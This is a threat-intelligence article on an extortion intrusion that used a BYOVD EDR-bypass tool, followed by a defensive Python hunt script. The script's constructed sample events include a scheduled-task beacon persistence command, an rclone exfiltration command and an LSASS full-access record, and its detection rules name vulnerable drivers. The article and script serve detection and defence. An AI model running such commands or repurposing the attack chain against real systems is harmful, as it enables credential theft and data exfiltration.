EDR Bypass Tool Exploited in Extortion Scheme
An investigation into an extortion attempt involving an AV/EDR bypass tool built on EDRSandBlast has yielded insights into the threat actor's tactics, their presence on cybercrime forums, and the growing market for tools designed to neutralize endpoint defenses. The incident response report by Unit 42 describes how the bypass tool, "disabler.exe," based on modified EDRSandBlast code, has gained traction on forums such as XSS and Exploit, with positive feedback from buyers. Unit 42's analysis underscores the rising threat posed by AV/EDR bypass tools, which continue to evolve and erode the protection that traditional endpoint defenses provide. Notably, there are overlaps between the tactics used in this attack and those linked to the Conti ransomware group, though no direct evidence that the Conti playbook was used was found on the rogue system.
Unit 42 reconstructed the attack path as follows. Initial access came through Atera, a legitimate remote monitoring and management (RMM) tool; the actor claimed to have purchased this access from an "independent hacktivist." Once inside the network, the threat actor used PsExec for lateral movement and deployed Cobalt Strike beacons to establish command and control (C2), with scheduled tasks providing persistence. The actor then ran a series of internal discovery commands on the domain controller and harvested credentials with Mimikatz and an LSASS memory dump. To keep those tools from being detected, "disabler.exe" was run first: it follows the BYOVD (Bring Your Own Vulnerable Driver) approach, loading the signed but vulnerable wnbios.sys or WN_64.sys driver to disable the EDR. Finally, Rclone was used to exfiltrate data.
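Each stage of that chain leaves a distinct host artifact: the PsExec service binary, a schtasks /create invocation, a driver-load event for wnbios.sys or WN_64.sys, a non-system process opening lsass.exe, and an rclone.exe process. The following hunt, written for this page rather than taken from the Unit 42 report, runs those five rules over a constructed, simplified Sysmon-style event stream and scores hosts by how many stages fired, since any one hit alone is noisier than the chain. The event field names, the sample events, and the LSASS allowlist are assumptions for the example, not the real Sysmon schema or data from the incident.

```python
"""Hunt for the TTPs named in the write-up (PsExec, scheduled-task persistence,
BYOVD driver load, LSASS access, Rclone) over a constructed, simplified
Sysmon-style event stream. Field names and sample data are assumptions for
this example, not the real Sysmon schema or data from the incident."""
import re
from collections import defaultdict

# Driver file names the write-up associates with the BYOVD step.
BYOVD_DRIVERS = {"wnbios.sys", "wn_64.sys"}
# Processes expected to open LSASS (assumed, minimal; tune per environment).
LSASS_ALLOWLIST = {"csrss.exe", "wininit.exe", "lsm.exe", "msmpeng.exe"}

# Constructed sample events (simplified fields; event_id follows Sysmon
# numbering: 1 process create, 6 driver load, 10 process access).
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T09:12:03", "event_id": 1, "host": "DC01",
     "image": r"C:\Windows\PSEXESVC.exe", "parent": r"C:\Windows\System32\services.exe",
     "cmdline": r"C:\Windows\PSEXESVC.exe"},
    {"ts": "2024-05-01T09:14:40", "event_id": 1, "host": "DC01",
     "image": r"C:\Windows\System32\schtasks.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'schtasks /create /tn "Updater" /tr C:\Users\Public\beacon.exe /sc minute /mo 5'},
    {"ts": "2024-05-01T09:20:11", "event_id": 6, "host": "DC01",
     "image_loaded": r"C:\Users\Public\WN_64.sys", "signed": "true"},
    {"ts": "2024-05-01T09:21:02", "event_id": 10, "host": "DC01",
     "source_image": r"C:\Users\Public\disabler.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1FFFFF"},
    {"ts": "2024-05-01T11:05:55", "event_id": 1, "host": "DC01",
     "image": r"C:\Users\Public\rclone.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"rclone.exe copy \\FS01\finance remote:bucket --transfers 8"},
    {"ts": "2024-05-01T11:06:10", "event_id": 1, "host": "WS02",
     "image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"ts": "2024-05-01T11:07:00", "event_id": 10, "host": "WS02",
     "source_image": r"C:\Windows\System32\csrss.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1000"},
]


def _basename(path):
    """Lower-cased file name from a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _proc(e, name):
    """True if e is a process-create event for the given image file name."""
    return e["event_id"] == 1 and _basename(e.get("image", "")) == name


# One rule per stage of the chain; each is a predicate over a single event.
RULES = [
    ("psexec_service", lambda e: _proc(e, "psexesvc.exe")),
    ("schtasks_persistence", lambda e: _proc(e, "schtasks.exe")
        and re.search(r"(^|\s)/create(\s|$)", e.get("cmdline", ""), re.I) is not None),
    ("byovd_driver_load", lambda e: e["event_id"] == 6
        and _basename(e.get("image_loaded", "")) in BYOVD_DRIVERS),
    ("lsass_access", lambda e: e["event_id"] == 10
        and _basename(e.get("target_image", "")) == "lsass.exe"
        and _basename(e.get("source_image", "")) not in LSASS_ALLOWLIST),
    ("rclone_exfil", lambda e: _proc(e, "rclone.exe")),
]


def hunt(events):
    """Return one finding per (event, rule) match."""
    findings = []
    for e in events:
        for name, match in RULES:
            if match(e):
                findings.append({"host": e["host"], "rule": name, "ts": e["ts"],
                                 "detail": e.get("cmdline") or e.get("image_loaded")
                                 or e.get("source_image")})
    return findings


def stages_by_host(findings):
    """Distinct rule names seen per host; the chain, not a single hit, is scored."""
    stages = defaultdict(set)
    for f in findings:
        stages[f["host"]].add(f["rule"])
    return dict(stages)


def suspicious_hosts(events, min_stages=3):
    """Hosts on which at least min_stages different stages of the chain fired."""
    return sorted(h for h, s in stages_by_host(hunt(events)).items() if len(s) >= min_stages)


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['ts']} {f['host']:5} {f['rule']:22} {f['detail']}")
    print("hosts with a multi-stage chain:", suspicious_hosts(SAMPLE_EVENTS))
```

On the sample data, DC01 trips all five rules and is reported; WS02 shows only a notepad launch and an allowlisted csrss.exe handle to LSASS, so it is not. In production the driver-load rule should also key on the driver's hash rather than its file name, since a renamed copy of the same vulnerable driver loads just as well.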
As the attack progressed, the threat actor moved to extort the victim, claiming to have exfiltrated a substantial volume of data, and sent an extortion email notifying the victim of the breach and the theft. Separately, Unit 42 discovered that rogue virtual machines had been connected to the victim's Cortex XDR tenant, which allowed Unit 42 to observe the threat actor's tools and processes directly. Among the artifacts found on these rogue systems were various malicious toolkits and screen recordings demonstrating successful AV/EDR bypasses, including Mimikatz executions after the bypass. Further review identified the same recordings being shared on cybercrime forums by a user under the alias "KernelMode."
Unit 42's in-depth investigation into this incident provided insights into the threat actor's methods, revealing overlaps with the tactics, techniques, and procedures (TTPs) commonly employed by Conti affiliates. As Unit 42 reported, "the rogue system contained ContiTraining.rar, but we found no indication that the attackers downloaded material from the Conti playbook on the rogue system. However, we observed some overlaps between the Conti playbook and tactics, techniques, and procedures (TTPs) captured during this incident attack chain." The overlaps evident in this intrusion included the use of Atera, Cobalt Strike, PsExec, and Rclone to achieve the respective stages of the attack. The investigation illustrates how cybercrime actors, tooling trends, and activity on cybercrime forums feed into one another.